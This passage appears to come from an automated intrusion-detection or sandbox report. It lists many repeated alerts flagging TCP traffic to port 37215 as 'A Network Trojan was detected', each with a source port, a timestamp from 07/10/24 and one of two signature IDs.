                  Source Port:33610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.096875
                  SID:2829579
                  Source Port:52424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.649292
                  SID:2829579
                  Source Port:42218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.432411
                  SID:2835222
                  Source Port:59914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.564107
                  SID:2835222
                  Source Port:60278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:44.496105
                  SID:2829579
                  Source Port:44774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.392716
                  SID:2835222
                  Source Port:54872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.428214
                  SID:2829579
                  Source Port:35940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.529956
                  SID:2829579
                  Source Port:53006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.894621
                  SID:2829579
                  Source Port:59818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.799288
                  SID:2829579
                  Source Port:52468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.399018
                  SID:2829579
                  Source Port:48638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.857998
                  SID:2829579
                  Source Port:38398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.598533
                  SID:2835222
                  Source Port:58788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.213907
                  SID:2829579
                  Source Port:36880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.830687
                  SID:2829579
                  Source Port:58566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.960934
                  SID:2835222
                  Source Port:46278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.795318
                  SID:2829579
                  Source Port:47972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.048430
                  SID:2835222
                  Source Port:37634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.054322
                  SID:2835222
                  Source Port:38668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.199768
                  SID:2835222
                  Source Port:58244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.748441
                  SID:2829579
                  Source Port:33626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.016670
                  SID:2835222
                  Source Port:49916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.952903
                  SID:2829579
                  Source Port:42834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.794548
                  SID:2835222
                  Source Port:34422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.583473
                  SID:2835222
                  Source Port:41666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.651870
                  SID:2829579
                  Source Port:52598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.401394
                  SID:2829579
                  Source Port:44994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835988
                  SID:2835222
                  Source Port:60032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398015
                  SID:2829579
                  Source Port:52748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.512950
                  SID:2835222
                  Source Port:39072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.490874
                  SID:2835222
                  Source Port:41018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.450144
                  SID:2835222
                  Source Port:57192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.164122
                  SID:2835222
                  Source Port:37472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389316
                  SID:2835222
                  Source Port:59524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.677011
                  SID:2835222
                  Source Port:38604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.145765
                  SID:2829579
                  Source Port:57976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.835620
                  SID:2835222
                  Source Port:58800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.444805
                  SID:2835222
                  Source Port:55080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.288154
                  SID:2829579
                  Source Port:39924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.655390
                  SID:2835222
                  Source Port:59290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.602329
                  SID:2835222
                  Source Port:50976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.511817
                  SID:2835222
                  Source Port:36726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.864679
                  SID:2829579
                  Source Port:37062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.623619
                  SID:2835222
                  Source Port:60212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.412825
                  SID:2829579
                  Source Port:34806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.099903
                  SID:2829579
                  Source Port:43288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.140303
                  SID:2829579
                  Source Port:43382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.925021
                  SID:2835222
                  Source Port:58694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.636058
                  SID:2829579
                  Source Port:44568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.276470
                  SID:2835222
                  Source Port:36440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.428710
                  SID:2829579
                  Source Port:53486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.230409
                  SID:2829579
                  Source Port:33470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234047
                  SID:2829579
                  Source Port:56944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384815
                  SID:2835222
                  Source Port:51786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.133795
                  SID:2835222
                  Source Port:46830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.016670
                  SID:2829579
                  Source Port:34168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.879112
                  SID:2829579
                  Source Port:38216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.571728
                  SID:2829579
                  Source Port:52102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.654674
                  SID:2829579
                  Source Port:44898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.835000
                  SID:2829579
                  Source Port:56772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.596946
                  SID:2835222
                  Source Port:58080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.607530
                  SID:2829579
                  Source Port:56348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081950
                  SID:2829579
                  Source Port:44340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778927
                  SID:2835222
                  Source Port:50644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.573004
                  SID:2829579
                  Source Port:38074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561915
                  SID:2835222
                  Source Port:58778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.066216
                  SID:2829579
                  Source Port:41638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.535361
                  SID:2829579
                  Source Port:56346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.878882
                  SID:2835222
                  Source Port:59872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.280858
                  SID:2829579
                  Source Port:34768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.012780
                  SID:2835222
                  Source Port:44204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.103598
                  SID:2829579
                  Source Port:36302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.913193
                  SID:2829579
                  Source Port:51954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.853499
                  SID:2829579
                  Source Port:51184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.521553
                  SID:2835222
                  Source Port:33336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.656959
                  SID:2835222
                  Source Port:41436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835160
                  SID:2829579
                  Source Port:45206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.597424
                  SID:2829579
                  Source Port:56954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.569815
                  SID:2829579
                  Source Port:48602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.379672
                  SID:2829579
                  Source Port:45386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591213
                  SID:2829579
                  Source Port:46434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.425890
                  SID:2829579
                  Source Port:56656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.387027
                  SID:2835222
                  Source Port:36900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.417954
                  SID:2829579
                  Source Port:33920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.813714
                  SID:2835222
                  Source Port:35078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.185610
                  SID:2835222
                  Source Port:59734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.009265
                  SID:2829579
                  Source Port:60466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.976557
                  SID:2835222
                  Source Port:34172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.835565
                  SID:2835222
                  Source Port:55408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.362536
                  SID:2835222
                  Source Port:54120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.891062
                  SID:2829579
                  Source Port:33480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.437986
                  SID:2835222
                  Source Port:45268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885671
                  SID:2835222
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.116363
                  SID:2835222
                  Source Port:54242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.177651
                  SID:2829579
                  Source Port:34588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152800
                  SID:2835222
                  Source Port:52388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.852225
                  SID:2829579
                  Source Port:60626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.472271
                  SID:2829579
                  Source Port:56278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.939250
                  SID:2835222
                  Source Port:51856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.646410
                  SID:2835222
                  Source Port:39086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853796
                  SID:2829579
                  Source Port:33954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.078993
                  SID:2835222
                  Source Port:55500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.587854
                  SID:2829579
                  Source Port:60562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872861
                  SID:2835222
                  Source Port:34798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.397077
                  SID:2835222
                  Source Port:58600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.865675
                  SID:2835222
                  Source Port:48262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.449371
                  SID:2829579
                  Source Port:46852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.637294
                  SID:2835222
                  Source Port:33740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.878190
                  SID:2835222
                  Source Port:47756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.844499
                  SID:2829579
                  Source Port:46946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.082361
                  SID:2835222
                  Source Port:44724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.783807
                  SID:2835222
                  Source Port:45670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.119507
                  SID:2835222
                  Source Port:55844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.996643
                  SID:2835222
                  Source Port:49212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.596557
                  SID:2835222
                  Source Port:53274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810148
                  SID:2829579
                  Source Port:57702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.519800
                  SID:2829579
                  Source Port:52448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.954473
                  SID:2835222
                  Source Port:37650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.036977
                  SID:2835222
                  Source Port:59078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.573653
                  SID:2829579
                  Source Port:52958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.153663
                  SID:2829579
                  Source Port:53714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.942038
                  SID:2829579
                  Source Port:52658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.986594
                  SID:2835222
                  Source Port:55842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.132092
                  SID:2835222
                  Source Port:46630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.637197
                  SID:2835222
                  Source Port:58736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127270
                  SID:2829579
                  Source Port:47024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833831
                  SID:2829579
                  Source Port:38232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.296944
                  SID:2835222
                  Source Port:50608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.599600
                  SID:2835222
                  Source Port:42208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.645798
                  SID:2835222
                  Source Port:38054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.368496
                  SID:2829579
                  Source Port:33644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.748441
                  SID:2835222
                  Source Port:57198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.297905
                  SID:2835222
                  Source Port:58718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.939164
                  SID:2835222
                  Source Port:53564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.865437
                  SID:2829579
                  Source Port:43420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.838932
                  SID:2829579
                  Source Port:58220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.554449
                  SID:2829579
                  Source Port:60634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.203668
                  SID:2835222
                  Source Port:48424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.467339
                  SID:2835222
                  Source Port:54360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.773956
                  SID:2829579
                  Source Port:51640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.350544
                  SID:2829579
                  Source Port:47720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.293850
                  SID:2829579
                  Source Port:53070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.776288
                  SID:2835222
                  Source Port:57966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.145425
                  SID:2829579
                  Source Port:37770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.766765
                  SID:2829579
                  Source Port:48442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.529678
                  SID:2835222
                  Source Port:35936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.648060
                  SID:2835222
                  Source Port:47594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.478672
                  SID:2835222
                  Source Port:36096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.504938
                  SID:2829579
                  Source Port:53736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.666761
                  SID:2829579
                  Source Port:42228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.064753
                  SID:2829579
                  Source Port:52348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.602789
                  SID:2835222
                  Source Port:58552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.789952
                  SID:2835222
                  Source Port:48700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.124417
                  SID:2835222
                  Source Port:33834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.297674
                  SID:2829579
                  Source Port:34334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.757034
                  SID:2835222
                  Source Port:45188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.790493
                  SID:2835222
                  Source Port:42128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.645443
                  SID:2835222
                  Source Port:34754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.914738
                  SID:2829579
                  Source Port:59776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169608
                  SID:2829579
                  Source Port:57450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558615
                  SID:2829579
                  Source Port:55128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.947908
                  SID:2829579
                  Source Port:59188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.997366
                  SID:2829579
                  Source Port:33344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.985108
                  SID:2835222
                  Source Port:38128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.159705
                  SID:2829579
                  Source Port:49898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.500429
                  SID:2829579
                  Source Port:42358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.245284
                  SID:2835222
                  Source Port:42884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.780112
                  SID:2835222
                  Source Port:39730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.757409
                  SID:2829579
                  Source Port:50356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.831965
                  SID:2829579
                  Source Port:52540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.255855
                  SID:2835222
                  Source Port:55334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.102138
                  SID:2835222
                  Source Port:41510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.564107
                  SID:2835222
                  Source Port:51968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.755286
                  SID:2835222
                  Source Port:33648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.781247
                  SID:2829579
                  Source Port:40004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.460852
                  SID:2829579
                  Source Port:34894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.186875
                  SID:2835222
                  Source Port:34340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.969982
                  SID:2835222
                  Source Port:59360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.507738
                  SID:2829579
                  Source Port:38596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.054152
                  SID:2835222
                  Source Port:46382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.941160
                  SID:2835222
                  Source Port:47122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.755153
                  SID:2835222
                  Source Port:37850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.840118
